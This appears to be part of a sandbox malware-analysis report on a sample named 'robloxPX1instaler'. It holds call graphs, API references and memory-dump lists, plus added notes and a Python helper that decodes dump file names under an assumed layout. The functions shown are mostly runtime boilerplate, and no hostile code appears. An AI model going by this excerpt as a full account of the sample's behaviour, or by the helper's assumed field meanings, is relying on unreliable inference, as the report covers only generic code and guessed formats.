1657->1661 1658->1657 1660 d42818 1659->1660 1662 d3a4b0 ___free_lconv_mon 14 API calls 1659->1662 1663 d4282a 1660->1663 1664 d3a4b0 ___free_lconv_mon 14 API calls 1660->1664 1661->1659 1662->1660 1665 d4283c 1663->1665 1666 d3a4b0 ___free_lconv_mon 14 API calls 1663->1666 1664->1663 1667 d4284e 1665->1667 1669 d3a4b0 ___free_lconv_mon 14 API calls 1665->1669 1666->1665 1668 d42860 1667->1668 1670 d3a4b0 ___free_lconv_mon 14 API calls 1667->1670 1671 d42872 1668->1671 1672 d3a4b0 ___free_lconv_mon 14 API calls 1668->1672 1669->1667 1670->1668 1673 d42884 1671->1673 1674 d3a4b0 ___free_lconv_mon 14 API calls 1671->1674 1672->1671 1675 d42896 1673->1675 1677 d3a4b0 ___free_lconv_mon 14 API calls 1673->1677 1674->1673 1676 d428a8 1675->1676 1678 d3a4b0 ___free_lconv_mon 14 API calls 1675->1678 1679 d428ba 1676->1679 1680 d3a4b0 ___free_lconv_mon 14 API calls 1676->1680 1677->1675 1678->1676 1679->1656 1681 d3a4b0 ___free_lconv_mon 14 API calls 1679->1681 1680->1679 1681->1656 1683 d42c93 1682->1683 1693 d42ceb 1682->1693 1684 d3a4b0 ___free_lconv_mon 14 API calls 1683->1684 1686 d42ca3 1683->1686 1684->1686 1685 d42cc7 1689 d42cd9 1685->1689 1691 d3a4b0 ___free_lconv_mon 14 API calls 1685->1691 1687 d3a4b0 ___free_lconv_mon 14 API calls 1686->1687 1690 d42cb5 1686->1690 1687->1690 1688 d3a4b0 ___free_lconv_mon 14 API calls 1688->1685 1692 d3a4b0 ___free_lconv_mon 14 API calls 1689->1692 1689->1693 1690->1685 1690->1688 1691->1689 1692->1693 1693->1635 1695 d4364c 1694->1695 1699 d4366b 1694->1699 1695->1699 1700 d431a1 1695->1700 1698 d3a4b0 ___free_lconv_mon 14 API calls 1698->1699 1699->1644 1701 d4327f 1700->1701 1702 d431b2 1700->1702 1701->1698 1736 d42f00 1702->1736 1705 d42f00 ___free_lconv_mon 14 API calls 1706 d431c5 1705->1706 1707 d42f00 ___free_lconv_mon 14 API calls 1706->1707 1708 d431d0 1707->1708 1709 d42f00 ___free_lconv_mon 14 API calls 1708->1709 1710 d431db 1709->1710 1711 d42f00 ___free_lconv_mon 14 API calls 1710->1711 1712 d431e9 1711->1712 
[Call-graph edge data continues here (nodes 1713 to 2018); the rendered graph is not reproduced. Windows APIs reached in this region: EnterCriticalSection / LeaveCriticalSection, SetConsoleCtrlHandler, GetLastError, SetLastError, RtlAllocateHeap, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary, ExitProcess, ExitThread, CloseHandle, FreeLibraryAndExitThread, plus the PEB reads the plugin marks as GetPEB. Runtime helpers named in the graph: the functions the plugin labels ___free_lconv_mon, _ValidateLocalCookies (00D12F6A) and __EH_prolog3 (00D37A47).]

Note: the node at 00D1E3C0 calls IsDebuggerPresent, SetUnhandledExceptionFilter and UnhandledExceptionFilter back to back, and its companion path (00D1E5A1 to 00D1E5C2) ends in GetCurrentProcess / TerminateProcess after IsProcessorFeaturePresent. That sequence matches the MSVC runtime's fast-fail / security-failure handler and is a likely source of the "IsDebuggerPresent" signature in this report; on its own it is weak evidence of deliberate anti-debugging. The EnterCriticalSection / LeaveCriticalSection pairs (00D34802 / 00D3484A) around the locale and heap helpers are likewise statically linked CRT teardown code rather than sample-specific logic.

Callgraph

[Rendered call graph of the 00A20000 module not reproduced. The edge list names 115 function nodes, Function_00D1DFD0 through Function_00D2462C, plus Function_00AB2120 outside the module. Function_00D16350 fans out to Function_00D1DFD0, Function_00D231DC, Function_00D1DFF0, Function_00D4DFF0, Function_00D172EC, Function_00D1DF90, Function_00D1DFB0, Function_00D4E1AA and Function_00D16310; most remaining edges converge on the runtime helper cluster around Function_00D3A4B0, Function_00D3A316, Function_00D1E672, the lock pair Function_00D34802 / Function_00D3484A (EnterCriticalSection / LeaveCriticalSection) and Function_00D12F6A (_ValidateLocalCookies).]

Control-flow Graph

[Function at 00D3D0F8 (blocks d3d0f8 to d3d13b); rendered graph not reproduced. The entry block d3d0f8 either leaves through d3d137 or reads the PEB at d3d10a (GetPEB); from there it goes to d3d12e directly or calls 00D3CB8D at d3d11d, tests the result at d3d126, and both paths rejoin at d3d12e before exiting through d3d137.]
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a6adbaf0148e7b147bd77c83c74fc48356adaef42b287500d8d23363923985ce
                                                                                  • Instruction ID: 9f02cf658c45d79b7813f07b337f0dc6bd6edac2063b065d91d4374afe439fc4
                                                                                  • Opcode Fuzzy Hash: a6adbaf0148e7b147bd77c83c74fc48356adaef42b287500d8d23363923985ce
                                                                                  • Instruction Fuzzy Hash: 47F03032621324ABCB36DA58D405A99B3E9EB49B61F114096E501EB140C770DE00CBE0
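To map the function addresses this report quotes (for example 00D3D0F8 above) onto the right dump file from the Memory Dump Source list, here is an added Python helper. It is example code written for this page, not Joe Sandbox's own tooling. It assumes the dump-name field layout described in its docstring, interprets the fifth field as a Windows PAGE_* protection value (consistent with the 0x02, 0x04, 0x08 and 0x20 seen here), and, because the page gives no region sizes, assumes each region ends where the next listed one begins.

```python
"""Decode the memory-dump file names Joe Sandbox lists under "Memory Dump Source".

Added example for this report, not Joe Sandbox code.  ASSUMED field layout:
process index . run index . serial . base address . protection . state . type .
module index . sdmp.  Only the base address and protection fields are relied on;
the protection value is read as a Windows PAGE_* constant (assumption).  Region
sizes are not on the page, so a region is assumed to end at the next region's base.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: a subset of the dump names copied from this report.
DUMP_NAMES = """
00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp
00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
""".split()

IMAGE_BASE = 0x00A20000      # "Offset: 00A20000, based on PE: true" on this page
LAST_REGION_SPAN = 0x1000    # no size for the final region: count only its first page

PAGE_PROTECT = {             # Windows memory protection constants (low byte)
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40, 0x80}

# Eight dot-separated fields then ".sdmp"; field widths taken from the names above.
NAME_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process: int
    base: int
    protect: int
    end: int = 0             # exclusive upper bound, filled in once neighbours are known

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, "0x%X" % self.protect)

    @property
    def executable(self) -> bool:
        return (self.protect & 0xFF) in EXECUTABLE_PROTECT

    @property
    def rva(self) -> int:
        """Offset of the region from the module's image base."""
        return self.base - IMAGE_BASE


def parse_dump_name(name: str) -> DumpRegion:
    m = NAME_RE.match(name.strip())
    if not m:
        raise ValueError("not a Joe Sandbox dump name: %r" % name)
    return DumpRegion(name=name.strip(), process=int(m["proc"], 16),
                      base=int(m["base"], 16), protect=int(m["protect"], 16))


def parse_regions(names: List[str], image_base: int = IMAGE_BASE) -> List[DumpRegion]:
    """Parse, keep regions at or above the image base, sort by address, and bound
    each region by the next one's base (assumption: contiguous, sizes unknown)."""
    regs = sorted((parse_dump_name(n) for n in names), key=lambda r: r.base)
    regs = [r for r in regs if r.base >= image_base]
    bounded = []
    for i, r in enumerate(regs):
        end = regs[i + 1].base if i + 1 < len(regs) else r.base + LAST_REGION_SPAN
        bounded.append(DumpRegion(r.name, r.process, r.base, r.protect, end))
    return bounded


def region_for_address(regs: List[DumpRegion], addr: int) -> Optional[DumpRegion]:
    """Which dump holds an address quoted in the report (e.g. 0xD3D0F8)?"""
    for r in regs:
        if r.base <= addr < r.end:
            return r
    return None


def executable_regions(regs: List[DumpRegion]) -> List[DumpRegion]:
    return [r for r in regs if r.executable]


if __name__ == "__main__":
    regions = parse_regions(DUMP_NAMES)
    for r in regions:
        tag = "<- code, load this one in IDA" if r.executable else ""
        print("%08X-%08X rva=%06X %-22s %s" % (r.base, r.end, r.rva, r.protect_name, tag))
    hit = region_for_address(regions, 0xD3D0F8)
    print("0xD3D0F8 lives in", hit.name if hit else "no listed dump")
```

The executable region (0x20, PAGE_EXECUTE_READ) is the 00A21000 dump, one page above the PE header dump at 00A20000, which is why every function address in these graphs (00D1xxxx to 00D5xxxx) falls inside it; the read/write regions above 00E50000 are data and are not where the disassembled code lives.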

Control-flow Graph

[Function at 00D3C9FF (blocks d3c9ff to d3cac8); rendered graph not reproduced. Block d3ca2e calls LoadLibraryExW; on failure d3ca49 calls GetLastError and, after two calls to 00D23142 at d3ca54 and d3ca68, d3ca7c retries LoadLibraryExW. A loaded handle is tested at d3caad and on one path released again by FreeLibrary at d3cabf before the function returns through d3cac6; the remaining blocks (d3ca23, d3ca9a, d3ca9d, d3caa6) form the loop and exit paths.]
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,1600CF06,?,00D3CB0C,?,?,?,00000000), ref: 00D3CAC0
Strings
• api-ms-
• ext-ms-
Note: the 00000800 among the stack values recorded at the FreeLibrary call is LOAD_LIBRARY_SEARCH_SYSTEM32, left over from the preceding LoadLibraryExW(name, NULL, 0x800). Combined with the api-ms- / ext-ms- prefix tests and the second, unrestricted LoadLibraryExW retry, this matches the module-loading thunk of the statically linked MSVC universal CRT: it retries without the System32 restriction only for names that are not API sets, and frees the freshly loaded handle when another thread has already cached one. Treat it as runtime boilerplate, not as sample-specific DLL loading.
Memory Dump Source
• Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
• Associated: the same 34 dump regions (00A20000 through 01B73000) listed under the previous function.
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID: api-ms-$ext-ms-
                                                                                  • API String ID: 3664257935-537541572
                                                                                  • Opcode ID: b8b6a841e896c95f1ef520f82e3a2d9ac566a7632465020e250c72801736dcc3
                                                                                  • Instruction ID: cb9b20526954eb41b1133340acc55ca4338f381d9e8310689e708338040579ea
                                                                                  • Opcode Fuzzy Hash: b8b6a841e896c95f1ef520f82e3a2d9ac566a7632465020e250c72801736dcc3
                                                                                  • Instruction Fuzzy Hash: 5B210372A10329ABC731DB31EC45A6A3768DB557A0F285620E912F72D0EB74EE01C7F0

Control-flow Graph

[Function at 00D244F4 (blocks d244f4 to d24544); rendered graph not reproduced. It first calls 00D3A316 at d244f4; if that yields nothing it goes straight to ExitThread at d24541. Otherwise d2450d-d24511 optionally calls 00D3D03E, d24520 tests a handle and d24524 closes it with CloseHandle, d24533 tests a module handle and, when set, d24537 calls FreeLibraryAndExitThread; every other path ends in ExitThread.]
APIs
• Part of subcall function 00D3A316: GetLastError.KERNEL32(00000000,?,00D1E677,00D3B9ED,?,?,00D3A212,00000001,00000364,?,00000006,000000FF,?,00D24464,00E4C1C8,0000000C), ref: 00D3A31A
• Part of subcall function 00D3A316: SetLastError.KERNEL32(00000000), ref: 00D3A3BC
• CloseHandle.KERNEL32(?,?,?,00D2462B,?,?,00D2449D,00000000), ref: 00D24525
• FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00D2462B,?,?,00D2449D,00000000), ref: 00D2453B
• ExitThread.KERNEL32 ref: 00D24544
Note: this shape (fetch per-thread data with the last-error value preserved, close the thread's own handle, FreeLibraryAndExitThread when the thread was started from a DLL, ExitThread otherwise) is the CRT's _endthreadex teardown. The FreeLibraryAndExitThread here is routine thread exit, not a module-unloading or injection trick.
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 1991824761-0
                                                                                  • Opcode ID: ec8c75d0b59db03a6b959922b4293e67133a362bb15aa98602edbdaf751cf15e
                                                                                  • Instruction ID: 85f626d4bab082426ea3b1508786f5ebda0b394aa402ea4db5fe4d699e1338ce
                                                                                  • Opcode Fuzzy Hash: ec8c75d0b59db03a6b959922b4293e67133a362bb15aa98602edbdaf751cf15e
                                                                                  • Instruction Fuzzy Hash: 40F012305007206BDB326F75EC0CA5A3A99AF11368F1C4710FCA5D76A0DB74DD82D671

Control-flow Graph

APIs
• GetLastError.KERNEL32(00E4C1C8,0000000C), ref: 00D24452
• ExitThread.KERNEL32 ref: 00D24459
Memory Dump Source
• Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
Similarity
• API ID: ErrorExitLastThread
• String ID:
• API String ID: 1611280651-0
• Opcode ID: 5678dd44f281968436cddc4f24acc592d3ad30a8ede653e501cdfa50e97e612f
• Instruction ID: 04baedc8827fabe15790455ad18f531407a0c6c154fbe85b8b5f3dbc1f588a1e
• Opcode Fuzzy Hash: 5678dd44f281968436cddc4f24acc592d3ad30a8ede653e501cdfa50e97e612f
• Instruction Fuzzy Hash: D2F0AF71940310AFDB05BFB0E84AA6E3B75EF41710F204648F41297252CFB49902DB71

Control-flow Graph

control_flow_graph 54 d3a4b0-d3a4b9 55 d3a4bb-d3a4ce RtlFreeHeap 54->55 56 d3a4e8-d3a4e9 54->56 55->56 57 d3a4d0-d3a4e7 GetLastError call d1e5d5 call d1e672 55->57 57->56
APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,00D42F19,?,00000000,?,?,00D431BA,?,00000007,?,?,00D43665,?,?), ref: 00D3A4C6
• GetLastError.KERNEL32(?,?,00D42F19,?,00000000,?,?,00D431BA,?,00000007,?,?,00D43665,?,?), ref: 00D3A4D1
Memory Dump Source
• Source File: 00000002.00000002.3208500465.0000000000A21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000002.00000002.3208451021.0000000000A20000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209096331.0000000000D68000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209210171.0000000000E50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209262595.0000000000E54000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209304895.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209335036.0000000000F08000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F12000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F17000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000F31000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000000FB9000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001096000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000109C000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000010A2000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001106000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001108000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000115B000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011AC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000011FD000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000124F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012A0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000012F1000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001342000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001393000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000013E4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001435000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001486000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000014D8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001529000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.000000000157A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.00000000015CB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B2E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B6E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3209362973.0000000001B71000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3210617118.0000000001B73000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a20000_robloxPX1instaler.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 1d351ba5531e249c662cf91ad767293bdb771eb9e5efc1b296d7ba1a093fee87
• Instruction ID: 8033d3c32ff8ca07308778f2fb773d4e2e2b785185443949cd564e1ce819d62f
• Opcode Fuzzy Hash: 1d351ba5531e249c662cf91ad767293bdb771eb9e5efc1b296d7ba1a093fee87
